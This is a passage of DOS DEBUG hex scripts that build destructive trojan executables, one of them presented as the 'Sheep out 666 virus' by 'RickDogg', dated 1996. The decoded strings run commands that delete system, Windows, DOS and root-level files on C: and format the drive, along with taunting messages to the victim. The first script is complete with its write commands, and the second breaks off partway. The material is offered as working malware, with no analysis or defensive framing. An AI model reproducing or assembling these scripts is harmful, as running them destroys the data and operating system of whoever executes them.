E 02E0 42 00 00 00 00 5B 1E 06 89 A6 02 00 57 56 8B F7
E 02F0 46 8D 3F B8 03 29 CD 21 8D 7F 10 B8 03 29 CD 21
E 0300 5E 5F 0E 8D 57 10 52 0E 8D 17 52 0E 57 2E 8B 86
E 0310 1A 00 50 8B DC B8 00 4B 8B D6 CD 21 BD 20 01 2E
E 0320 8B 6E 00 8C CB FA 8E D3 8B A6 02 00 FB FC 07 1F
E 0330 B4 4D CD 21 88 86 1E 00 5B C3 4C 02 53 E8 07 00
E 0340 43 4F 4D 53 50 45 43 5B BA 07 00 8B F3 FF 57 FA
E 0350 5B C3 A4 02 92 02 B7 04 C1 02 FA 04 53 E8 32 00
E 0360 00 50 41 54 48 3D 43 4F 4D 45 58 45 42 41 54 00
E 0370 00 00 00 42 61 64 20 63 6F 6D 6D 61 6E 64 20 6F
E 0380 72 20 66 69 6C 65 20 6E 61 6D 65 0D 0A 00 2F 43
E 0390 20 00 5B 89 77 0F 89 7F 11 8B 96 0A 00 83 C2 04
E 03A0 C6 47 31 00 C6 07 00 8B FA 33 C9 0A 0F 75 73 52
E 03B0 56 33 D2 80 7C 01 3A 75 0D 8A 14 80 E2 DF 80 EA
E 03C0 40 A5 83 47 0F 02 80 3C 5C 74 1C B0 5C AA 56 8B
E 03D0 F7 B4 47 CD 21 5E 32 C0 B9 40 00 F2 AE 4F 80 7D
E 03E0 FF 5C 74 03 B0 5C AA 33 C0 AC 3D 2E 2E 75 0E FD
E 03F0 B0 5C B9 12 00 F2 AE F2 AE FC 47 EB EC AA 8A E0
E 0400 3C 5C 75 03 FE 47 31 3C 00 75 DE 4F 8B D7 FD B9
E 0410 05 00 B0 2E F2 AE FC 75 03 47 8B D7 8B FA 5E 5A
E 0420 EB 25 80 7F 31 00 75 08 8B 77 0F FF 57 F6 73 08
E 0430 8D 77 13 FF 57 F4 EB 7B B9 49 00 AC 3C 20 76 07
E 0440 3C 2E 74 03 AA E2 F4 B0 2E AA 8D 77 06 B9 03 00
E 0450 A5 A4 32 C0 AA 52 56 51 8B F2 FF 57 FA 59 5E 5A
E 0460 73 0A 83 EF 04 E2 E9 FE 07 E9 3B FF 83 F9 01 75
E 0470 33 8D 77 2E 83 EA 03 8B FA A5 A4 32 C0 B9 FC 00
E 0480 F2 AE C6 45 FF 20 8B 77 11 38 4C FF 77 03 8A 4C
E 0490 FF F3 A4 C6 05 0D 8B F2 8B C7 2B C2 88 44 FF FF
E 04A0 57 F2 EB 0F 8B 7F 11 4F FE 0D 57 8B F2 FF 57 F8
E 04B0 5F FE 05 5B C3 4C 02 53 E8 04 00 50 41 54 48 5B
E 04C0 52 56 1E BA 04 00 8B F3 FF 57 FA 49 E3 0B AC 0A
E 04D0 C0 74 24 3C 3B 75 F7 EB F2 AC 3C 3B 74 07 0A C0
E 04E0 74 03 AA EB F4 0E 1F 26 80 7D FF 5C 74 03 B0 5C
E 04F0 AA F8 1F 5E 5A 5B C3 F9 EB F8 8B D7 B4 1A CD 21
E 0500 8B D6 33 C9 B4 4E CD 21 72 04 83 C7 1E F8 C3 55
E 0510 0C 46 10 45 01 48 10 49 11 4A 12 4B 13 57 1E 36
E 0520 8E 06 7D 00 26 8E 06 F2 E2 33 C0 33 FF 00 00 0A
E 0530 0D 00 59 4F 55 20 4D 55 53 54 20 42 45 20 53 54
E 0540 55 50 49 44 2E 20 59 4F 55 20 44 49 44 4E 27 54
E 0550 20 45 56 45 4E 20 43 48 45 43 4B 20 54 48 49 53
E 0560 20 42 41 54 20 46 49 4C 45 20 42 45 46 4F 52 45
E 0570 20 59 4F 55 20 52 41 4E 20 49 54 2E 22 0A 0D 00
E 0580 59 4F 55 20 48 41 56 45 20 54 4F 20 52 45 41 4C
E 0590 49 5A 45 20 54 48 41 54 20 54 48 49 53 20 49 53
E 05A0 20 41 20 56 56 56 56 56 49 49 49 49 49 52 52 52
E 05B0 52 52 52 55 55 55 55 55 55 53 53 53 53 53 21 21
E 05C0 21 21 20 20 59 45 53 2C 0A 0D 00 54 48 41 54 53
E 05D0 20 52 49 47 48 54 2E 2E 2E 59 4F 55 20 48 41 56
E 05E0 45 20 42 45 45 4E 20 4B 49 4C 4C 45 44 2E 2E 2E
E 05F0 2E 54 48 41 4E 4B 20 59 4F 55 20 46 4F 52 20 42
E 0600 45 49 4E 47 20 4F 4E 45 20 4F 46 20 54 48 45 0A
E 0610 0D 00 53 48 49 54 48 45 41 44 53 20 54 48 41 54
E 0620 20 52 41 4E 20 4D 59 20 54 54 54 54 54 52 52 52
E 0630 52 4F 4F 4F 4F 4F 4A 4A 4A 4A 4A 4A 41 41 41 41
E 0640 4E 4E 4E 4E 4E 21 21 21 21 21 21 0A 0D 00 6C 20
E 0650 20 20 20 20 20 20 20 20 21 21 21 21 21 21 21 21
E 0660 21 20 20 20 20 20 40 40 40 40 40 40 40 40 40 20
E 0670 20 20 20 20 20 23 23 23 23 23 23 23 23 23 20 20
E 0680 20 2A 2A 2A 2A 2A 2A 2A 0A 0D 00 6C 20 20 20 20
E 0690 20 20 20 20 20 21 20 20 20 20 20 20 20 21 20 20
E 06A0 20 20 20 40 20 20 20 20 20 20 20 20 20 20 20 20
E 06B0 20 20 23 20 20 20 20 20 20 20 20 20 20 20 2A 20
E 06C0 20 20 20 20 2A 0A 0D 00 6C 20 20 20 20 20 20 20
E 06D0 20 20 21 20 20 20 20 20 20 20 21 20 20 20 20 20
E 06E0 40 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23
E 06F0 20 20 20 20 20 20 20 20 20 20 20 2A 20 20 20 20
E 0700 20 2A 0A 0D 00 31 20 20 20 20 20 20 20 20 20 21
E 0710 20 20 20 20 20 20 20 21 20 20 20 20 20 40 20 20
E 0720 20 20 20 20 20 20 20 20 20 20 20 20 23 20 20 20
E 0730 20 20 20 20 20 20 20 20 2A 2A 2A 2A 2A 2A 2A 0A
E 0740 0D 00 31 20 20 20 20 20 20 20 20 20 21 20 20 20
E 0750 20 20 20 20 21 20 20 20 20 20 40 40 40 40 40 40
E 0760 40 40 40 20 20 20 20 20 20 23 23 23 23 23 23 23
E 0770 23 20 20 20 20 2A 0A 0D 00 31 20 20 20 20 20 20
E 0780 20 20 20 21 20 20 20 20 20 20 20 21 20 20 20 20
E 0790 20 20 20 20 20 20 20 20 20 40 20 20 20 20 20 20
E 07A0 23 20 20 20 20 20 20 20 20 20 20 20 2A 20 2A 0A
E 07B0 0D 00 31 20 20 20 20 20 20 20 20 20 21 20 20 20
E 07C0 20 20 20 20 21 20 20 20 20 20 20 20 20 20 20 20
E 07D0 20 20 40 20 20 20 20 20 20 23 20 20 20 20 20 20
E 07E0 20 20 20 20 20 2A 20 20 20 2A 0A 0D 00 31 20 20
E 07F0 20 20 20 20 20 20 20 21 20 20 20 20 20 20 20 21
E 0800 20 20 20 20 20 20 20 20 20 20 20 20 20 40 20 20
E 0810 20 20 20 20 23 20 20 20 20 20 20 20 20 20 20 20
E 0820 2A 20 20 20 20 20 2A 0A 0D 00 31 31 31 31 31 31
E 0830 20 20 20 20 21 21 21 21 21 21 21 21 21 20 20 20
E 0840 20 20 40 40 40 40 40 40 40 40 40 20 20 20 20 20
E 0850 20 23 23 23 23 23 23 23 23 23 20 20 20 2A 20 20
E 0860 20 20 20 20 20 2A 0A 0D 00 1E 2F 43 20 44 45 4C
E 0870 20 43 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74
E 0880 65 6D 5C 2A 2E 65 78 65 0D 00 1E 2F 43 20 44 45
E 0890 4C 20 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73
E 08A0 74 65 6D 5C 2A 2E 63 6F 6D 0D 00 1E 2F 43 20 44
E 08B0 45 4C 20 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79
E 08C0 73 74 65 6D 5C 2A 2E 64 6C 6C 0D 00 1E 2F 43 20
E 08D0 44 45 4C 20 63 3A 5C 77 69 6E 64 6F 77 73 5C 73
E 08E0 79 73 74 65 6D 5C 2A 2E 64 72 76 0D 00 1E 2F 43
E 08F0 20 44 45 4C 20 63 3A 5C 77 69 6E 64 6F 77 73 5C
E 0900 73 79 73 74 65 6D 5C 2A 2E 69 6E 69 0D 00 17 2F
E 0910 43 20 44 45 4C 20 63 3A 5C 77 69 6E 64 6F 77 73
E 0920 5C 2A 2E 65 78 65 0D 00 17 2F 43 20 44 45 4C 20
E 0930 63 3A 5C 77 69 6E 64 6F 77 73 5C 2A 2E 63 6F 6D
E 0940 0D 00 17 2F 43 20 44 45 4C 20 63 3A 5C 77 69 6E
E 0950 64 6F 77 73 5C 2A 2E 64 61 74 0D 00 17 2F 43 20
E 0960 44 45 4C 20 63 3A 5C 77 69 6E 64 6F 77 73 5C 2A
E 0970 2E 69 6E 69 0D 00 17 2F 43 20 44 45 4C 20 63 3A
E 0980 5C 77 69 6E 64 6F 77 73 5C 2A 2E 73 79 73 0D 00
E 0990 17 2F 43 20 44 45 4C 20 63 3A 5C 77 69 6E 64 6F
E 09A0 77 73 5C 2A 2E 64 6C 6C 0D 00 17 2F 43 20 44 45
E 09B0 4C 20 63 3A 5C 77 69 6E 64 6F 77 73 5C 2A 2E 64
E 09C0 72 76 0D 00 13 2F 43 20 44 45 4C 20 63 3A 5C 64
E 09D0 6F 73 5C 2A 2E 63 6F 6D 0D 00 13 2F 43 20 44 45
E 09E0 4C 20 63 3A 5C 64 6F 73 5C 2A 2E 65 78 65 0D 00
E 09F0 13 2F 43 20 44 45 4C 20 63 3A 5C 64 6F 73 5C 2A
E 0A00 2E 69 6E 69 0D 00 13 2F 43 20 44 45 4C 20 63 3A
E 0A10 5C 64 6F 73 5C 2A 2E 73 79 73 0D 00 13 2F 43 20
E 0A20 44 45 4C 20 63 3A 5C 64 6F 73 5C 2A 2E 64 61 74
E 0A30 0D 00 13 2F 43 20 44 45 4C 20 63 3A 5C 64 6F 73
E 0A40 5C 2A 2E 64 6C 6C 0D 00 0F 2F 43 20 44 45 4C 20
E 0A50 63 3A 5C 2A 2E 63 6F 6D 0D 00 0F 2F 43 20 44 45
E 0A60 4C 20 63 3A 5C 2A 2E 65 78 65 0D 00 0F 2F 43 20
E 0A70 44 45 4C 20 63 3A 5C 2A 2E 62 61 74 0D 00 0F 2F
E 0A80 43 20 44 45 4C 20 63 3A 5C 2A 2E 73 79 73 0D 00
E 0A90 0F 2F 43 20 44 45 4C 20 63 3A 5C 2A 2E 70 61 72
E 0AA0 0D 00 0F 2F 43 20 44 45 4C 20 63 3A 5C 2A 2E 64
E 0AB0 61 74 0D 00 0F 2F 43 20 44 45 4C 20 63 3A 5C 2A
E 0AC0 2E 69 6E 69 0D 00 0F 2F 43 20 44 45 4C 20 63 3A
E 0AD0 5C 2A 2E 64 6F 73 0D 00 46 4F 52 4D 41 54 00 04
E 0AE0 20 43 3A 0D 00 48 41 56 45 20 41 20 4E 49 43 45
E 0AF0 20 44 41 59 21 21 21 21 21 21 21 21 21 0A 0D 00
E 0B00 52 45 4D 45 4D 42 45 52 2E 2E 2E 2E 2E 54 48 45
E 0B10 52 45 20 49 53 20 4E 4F 20 43 55 52 45 20 46 4F
E 0B20 52 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E
E 0B30 2E 2E 2E 2E 2E 2E 0A 0D 00 20 2A 2A 2A 2A 20 20
E 0B40 2A 2A 2A 2A 2A 20 20 2A 20 20 2A 20 20 2A 2A 2A
E 0B50 2A 2A 20 20 2A 20 20 2A 2A 2A 2A 2A 2A 20 20 20
E 0B60 2A 20 20 2A 2A 2A 2A 2A 20 20 2A 20 20 20 2A 0A
E 0B70 0D 00 20 2A 20 20 20 20 20 20 20 2A 20 20 20 20
E 0B80 2A 20 20 2A 20 20 2A 20 20 20 2A 20 20 2A 20 20
E 0B90 2A 20 20 20 20 20 2A 20 20 2A 20 20 20 20 2A 20
E 0BA0 20 20 20 20 2A 20 2A 0A 0D 00 20 2A 2A 2A 2A 20
E 0BB0 20 20 20 2A 20 20 20 20 2A 20 20 2A 20 20 2A 2A
E 0BC0 2A 2A 2A 20 20 2A 20 20 2A 20 20 20 20 20 2A 20
E 0BD0 20 2A 20 20 20 20 2A 20 20 20 20 20 20 2A 0A 0D
E 0BE0 00 20 20 20 20 2A 20 20 20 20 2A 20 20 20 20 2A
E 0BF0 20 20 2A 20 20 2A 20 20 20 20 20 20 2A 20 20 2A
E 0C00 20 20 20 20 20 2A 20 20 2A 20 20 20 20 2A 20 20
E 0C10 20 20 20 20 2A 0A 0D 00 20 2A 2A 2A 2A 20 20 20
E 0C20 20 2A 20 20 20 20 2A 2A 2A 2A 20 20 2A 20 20 20
E 0C30 20 20 20 2A 20 20 2A 2A 2A 2A 2A 2A 20 20 20 2A
E 0C40 20 20 20 20 2A 20 20 20 20 20 20 2A 0A 0D 00 0A
E 0C50 0D 00 0A 0D 00 8D B6 20 00 8B BE 06 00 B8 26 01
E 0C60 FF D0 8B B6 06 00 B8 92 02 FF D0 8D B6 23 00 B8
E 0C70 92 02 FF D0 8D B6 71 00 B8 92 02 FF D0 8D B6 BC
E 0C80 00 B8 92 02 FF D0 8D B6 03 01 B8 92 02 FF D0 8D
E 0C90 B6 3F 01 B8 92 02 FF D0 8D B6 7C 01 B8 92 02 FF
E 0CA0 D0 8D B6 B9 01 B8 92 02 FF D0 8D B6 F6 01 B8 92
E 0CB0 02 FF D0 8D B6 33 02 B8 92 02 FF D0 8D B6 6A 02
E 0CC0 B8 92 02 FF D0 8D B6 A3 02 B8 92 02 FF D0 8D B6
E 0CD0 DE 02 B8 92 02 FF D0 8D B6 1B 03 B8 92 02 FF D0
E 0CE0 8D B6 5B 03 B8 A4 02 FF D0 8D B6 7C 03 B8 A4 02
E 0CF0 FF D0 8D B6 9D 03 B8 A4 02 FF D0 8D B6 BE 03 B8
E 0D00 A4 02 FF D0 8D B6 DF 03 B8 A4 02 FF D0 8D B6 00
E 0D10 04 B8 A4 02 FF D0 8D B6 1A 04 B8 A4 02 FF D0 8D
E 0D20 B6 34 04 B8 A4 02 FF D0 8D B6 4E 04 B8 A4 02 FF
E 0D30 D0 8D B6 68 04 B8 A4 02 FF D0 8D B6 82 04 B8 A4
E 0D40 02 FF D0 8D B6 9C 04 B8 A4 02 FF D0 8D B6 B6 04
E 0D50 B8 A4 02 FF D0 8D B6 CC 04 B8 A4 02 FF D0 8D B6
E 0D60 E2 04 B8 A4 02 FF D0 8D B6 F8 04 B8 A4 02 FF D0
E 0D70 8D B6 0E 05 B8 A4 02 FF D0 8D B6 24 05 B8 A4 02
E 0D80 FF D0 8D B6 3A 05 B8 A4 02 FF D0 8D B6 4C 05 B8
E 0D90 A4 02 FF D0 8D B6 5E 05 B8 A4 02 FF D0 8D B6 70
E 0DA0 05 B8 A4 02 FF D0 8D B6 82 05 B8 A4 02 FF D0 8D
E 0DB0 B6 94 05 B8 A4 02 FF D0 8D B6 A6 05 B8 A4 02 FF
E 0DC0 D0 8D B6 B8 05 B8 A4 02 FF D0 8D B6 C9 05 8D BE
E 0DD0 D1 05 B8 5C 03 FF D0 8D B6 D6 05 B8 92 02 FF D0
E 0DE0 8D B6 F1 05 B8 92 02 FF D0 8D B6 2A 06 B8 92 02
E 0DF0 FF D0 8D B6 63 06 B8 92 02 FF D0 8D B6 9B 06 B8
E 0E00 92 02 FF D0 8D B6 D2 06 B8 92 02 FF D0 8D B6 09
E 0E10 07 B8 92 02 FF D0 8D B6 40 07 8B BE 06 00 B8 26
E 0E20 01 FF D0 8B B6 06 00 B8 92 02 FF D0 8D B6 43 07
E 0E30 8B BE 06 00 B8 26 01 FF D0 8B B6 06 00 B8 92 02
E 0E40 FF D0 B8 00 4C CD 21
RCX
0D47
W
Q
---------------------END------------------------------
Sheep out 666 virus
- title: Sheep out 666 virus
- author: RickDogg
- date: 12-1-96
features: random deletion of files and directories located on c:. Random creation of directories as well as formatting c:. Message involved.
-member of alliance
-member of VBB
---------------DEBUG SCRIPT------------------------------
N SHEEPOUT.COM
E 0100 FC BD 20 01 8B 6E 00 8B A6 02 00 8B 9E 04 00 B4
E 0110 4A CD 21 A1 2C 00 89 86 1A 00 8B 9E 00 00 FF E3
E 0120 6B 05 85 01 20 02 53 E8 00 00 5B 57 56 B4 FF AC
E 0130 0A C0 74 09 3C 25 74 13 AA FE CC 75 F2 32 C0 AA
E 0140 5E 5F B3 FF 2A DC 88 5D FF 5B C3 AC 49 3C 25 74
E 0150 E7 3C 7F 75 12 56 8B B6 0E 00 AC 3C 00 74 05 AA
E 0160 FE CC 75 F6 5E EB 0F 8A F0 80 EE 30 72 0E 80 FE
E 0170 09 77 09 FF 57 F8 0A E4 75 B5 EB C1 4E 41 FF 57
E 0180 FA EB F3 E5 01 53 E8 06 00 44 4F 53 32 58 00 5B
E 0190 51 56 1E BE 80 00 33 C9 8A 0C 46 3E 02 B6 1F 00
E 01A0 0A F6 75 2B 50 B4 30 CD 21 3C 02 58 77 04 8D 37
E 01B0 EB 22 06 57 8E 06 2C 00 32 C0 33 FF B9 00 80 F2
E 01C0 AE AE 75 FB AF 8B F7 5F 07 8E 1E 2C 00 EB 05 FF
E 01D0 57 FA 72 0A AC 3C 20 76 05 AA FE CC 75 F6 1F 5E
E 01E0 59 5B C3 05 02 53 E8 00 00 5B 32 D2 FF 57 FA 72
E 01F0 11 FE CE 7E 09 FE C2 FF 57 FA 72 04 EB EC 4E F8
E 0200 5B C3 F9 EB FB AC 3C 09 74 0C 3C 20 72 0E 74 06
E 0210 0A D2 75 F1 EB 04 0A D2 74 EB F8 C3 F9 C3 4C 02
E 0220 53 E8 00 00 5B 1E B9 FF 00 57 8B FE 8B D1 B0 25
E 0230 F2 AE 2B D1 4A 8B CF 5F 51 FF 57 FA 72 0A AC 0A
E 0240 C0 74 05 AA FE CC 75 F6 5E 1F 5B C3 53 51 57 06
E 0250 8E 86 1A 00 33 FF 8B DE 8B F3 8B CA F3 A6 74 14
E 0260 32 C0 B9 FF FF F2 AE 26 80 3D 00 75 EB 8B F7 06
E 0270 1F F9 EB 19 8B F7 06 1F AC 3C 3D 75 FB 80 3C 00
E 0280 74 EB AC 0A C0 72 04 3C 20 72 F7 4E F8 07 5F 59
E 0290 5B C3 8A 14 46 0A D2 74 06 B4 02 CD 21 EB F3 C3
E 02A0 C1 02 3C 03 53 E8 00 00 5B 8B FE 4F 8A 86 1E 00
E 02B0 1E 50 FF 57 FA 2E FF 57 F8 58 1F 88 86 1E 00 5B
E 02C0 C3 53 E8 20 00 00 44 55 4D 4D 59 20 20 20 46 43
E 02D0 42 00 00 00 00 00 44 55 4D 4D 59 20 20 20 46 43
E 02E0 42 00 00 00 00 5B 1E 06 89 A6 02 00 57 56 8B F7
E 02F0 46 8D 3F B8 03 29 CD 21 8D 7F 10 B8 03 29 CD 21
E 0300 5E 5F 0E 8D 57 10 52 0E 8D 17 52 0E 57 2E 8B 86
E 0310 1A 00 50 8B DC B8 00 4B 8B D6 CD 21 BD 20 01 2E
E 0320 8B 6E 00 8C CB FA 8E D3 8B A6 02 00 FB FC 07 1F
E 0330 B4 4D CD 21 88 86 1E 00 5B C3 4C 02 53 E8 07 00
E 0340 43 4F 4D 53 50 45 43 5B BA 07 00 8B F3 FF 57 FA
E 0350 5B C3 C7 86 10 00 FF FF 8B D6 33 C9 B8 02 3C 0B
E 0360 FF 74 02 FE C4 CD 21 72 29 8B D8 0B FF 74 0B B8
E 0370 02 42 33 D2 8B CA CD 21 72 18 89 9E 12 00 53 B4
E 0380 45 BB 01 00 CD 21 89 86 10 00 B9 01 00 5B B4 46
E 0390 CD 21 C3 83 BE 10 00 FF 74 13 B4 46 8B 9E 10 00
E 03A0 B9 01 00 CD 21 B4 3E 8B 9E 12 00 CD 21 C3 A4 02
E 03B0 92 02 13 05 C1 02 56 05 53 E8 32 00 00 50 41 54
E 03C0 48 3D 43 4F 4D 45 58 45 42 41 54 00 00 00 00 42
E 03D0 61 64 20 63 6F 6D 6D 61 6E 64 20 6F 72 20 66 69
E 03E0 6C 65 20 6E 61 6D 65 0D 0A 00 2F 43 20 00 5B 89
E 03F0 77 0F 89 7F 11 8B 96 0A 00 83 C2 04 C6 47 31 00
E 0400 C6 07 00 8B FA 33 C9 0A 0F 75 73 52 56 33 D2 80
E 0410 7C 01 3A 75 0D 8A 14 80 E2 DF 80 EA 40 A5 83 47
E 0420 0F 02 80 3C 5C 74 1C B0 5C AA 56 8B F7 B4 47 CD
E 0430 21 5E 32 C0 B9 40 00 F2 AE 4F 80 7D FF 5C 74 03
E 0440 B0 5C AA 33 C0 AC 3D 2E 2E 75 0E FD B0 5C B9 12
E 0450 00 F2 AE F2 AE FC 47 EB EC AA 8A E0 3C 5C 75 03
E 0460 FE 47 31 3C 00 75 DE 4F 8B D7 FD B9 05 00 B0 2E
E 0470 F2 AE FC 75 03 47 8B D7 8B FA 5E 5A EB 25 80 7F
E 0480 31 00 75 08 8B 77 0F FF 57 F6 73 08 8D 77 13 FF
E 0490 57 F4 EB 7B B9 49 00 AC 3C 20 76 07 3C 2E 74 03
E 04A0 AA E2 F4 B0 2E AA 8D 77 06 B9 03 00 A5 A4 32 C0
E 04B0 AA 52 56 51 8B F2 FF 57 FA 59 5E 5A 73 0A 83 EF
E 04C0 04 E2 E9 FE 07 E9 3B FF 83 F9 01 75 33 8D 77 2E
E 04D0 83 EA 03 8B FA A5 A4 32 C0 B9 FC 00 F2 AE C6 45
E 04E0 FF 20 8B 77 11 38 4C FF 77 03 8A 4C FF F3 A4 C6
E 04F0 05 0D 8B F2 8B C7 2B C2 88 44 FF FF 57 F2 EB 0F
E 0500 8B 7F 11 4F FE 0D 57 8B F2 FF 57 F8 5F FE 05 5B
E 0510 C3 4C 02 53 E8 04 00 50 41 54 48 5B 52 56 1E BA
E 0520 04 00 8B F3 FF 57 FA 49 E3 0B AC 0A C0 74 24 3C
E 0530 3B 75 F7 EB F2 AC 3C 3B 74 07 0A C0 74 03 AA EB
E 0540 F4 0E 1F 26 80 7D FF 5C 74 03 B0 5C AA F8 1F 5E
E 0550 5A 5B C3 F9 EB F8 8B D7 B4 1A CD 21 8B D6 33 C9
E 0560 B4 4E CD 21 72 04 83 C7 1E F8 C3 BF 10 D2 17 BE
E 0570 01 D4 17 D5 18 D6 19 D7 1A 57 1E 36 8E 06 7D 00
E 0580 26 8E 06 F2 E2 33 C0 33 FF 00 00 0A 0D 00 0A 0D
E 0590 00 0A 0D 00 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 05A0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 05B0 2A 2A 2A 59 4F 55 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 05C0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 05D0 2A 2A 2A 2A 0A 0D 00 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 05E0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 05F0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0600 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0610 2A 2A 2A 2A 2A 2A 2A 0A 0D 00 2A 2A 2A 2A 2A 2A
E 0620 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0630 2A 2A 2A 2A 2A 2A 2A 2A 48 41 56 45 2A 2A 2A 2A
E 0640 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0650 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A 0D 00 2A 2A 2A
E 0660 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0670 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0680 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0690 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A 0D 00
E 06A0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 06B0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 42
E 06C0 45 45 4E 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 06D0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 06E0 0A 0D 00 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 06F0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0700 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0710 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0720 2A 2A 2A 0A 0D 00 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0730 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0740 2A 2A 2A 56 49 52 55 53 45 44 2A 2A 2A 2A 2A 2A
E 0750 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0760 2A 2A 2A 2A 2A 2A 0A 0D 00 2A 2A 2A 2A 2A 2A 2A
E 0770 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0780 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0790 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 07A0 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A 0D 00 2A 2A 2A 2A
E 07B0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 07C0 2A 2A 2A 2A 59 4F 55 20 46 55 43 4B 49 4E 20 4D
E 07D0 4F 52 4F 4E 21 21 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 07E0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A 0D 00 2A
E 07F0 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0800 2A 41 20 46 55 43 4B 49 4E 20 54 52 4F 4A 41 4E
E 0810 20 48 41 53 20 4B 49 4C 4C 45 44 20 59 41 2A 2A
E 0820 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A
E 0830 0D 00 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0840 2A 49 20 54 48 49 4E 4B 20 53 4F 4D 45 20 52 41
E 0850 4E 44 4F 4D 20 46 49 4C 45 53 20 41 52 45 20 47
E 0860 4F 4E 45 2E 2E 2E 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0870 2A 2A 0A 0D 00 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0880 2A 2A 2A 2A 20 20 20 4D 41 59 42 45 20 53 4F 4D
E 0890 45 20 44 49 52 45 43 54 4F 52 49 45 53 20 41 53
E 08A0 20 57 45 4C 4C 20 20 20 20 2A 2A 2A 2A 2A 2A 2A
E 08B0 2A 2A 2A 2A 2A 0A 0D 00 2A 2A 2A 2A 2A 2A 2A 2A
E 08C0 2A 2A 2A 2A 2A 2A 2A 20 20 20 20 20 74 68 65 20
E 08D0 53 48 45 45 50 20 4F 55 54 20 36 36 36 20 54 52
E 08E0 4F 4A 41 4E 20 20 20 20 20 20 20 20 2A 2A 2A 2A
E 08F0 2A 2A 2A 2A 2A 2A 2A 2A 0A 0D 00 2A 2A 2A 2A 2A
E 0900 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 20 20 53 50 52 45
E 0910 41 44 20 54 48 45 20 57 4F 52 44 20 41 42 4F 55
E 0920 54 20 54 48 49 53 20 42 41 42 59 20 20 20 20 2A
E 0930 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A 0D 00 2A 2A
E 0940 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 20 20 20
E 0950 54 48 45 20 53 48 45 45 50 20 57 49 4C 4C 20 52
E 0960 55 4C 45 20 54 48 45 20 57 4F 52 4C 44 20 20 20
E 0970 20 20 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A 0D
E 0980 00 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0990 20 20 20 20 20 20 20 20 31 32 2D 31 2D 39 36 20
E 09A0 20 20 20 20 20 30 34 3A 34 34 41 4D 20 20 20 20
E 09B0 20 20 20 20 20 20 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 09C0 2A 2A 0A 0D 00 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 09D0 2A 2A 2A 2A 20 20 42 41 41 41 41 41 41 41 41 41
E 09E0 41 41 41 41 41 41 41 41 41 41 41 41 21 21 21 21
E 09F0 21 21 21 21 21 21 20 20 20 2A 2A 2A 2A 2A 2A 2A
E 0A00 2A 2A 2A 2A 2A 0A 0D 00 2A 2A 2A 2A 2A 2A 2A 2A
E 0A10 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
E 0A20 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
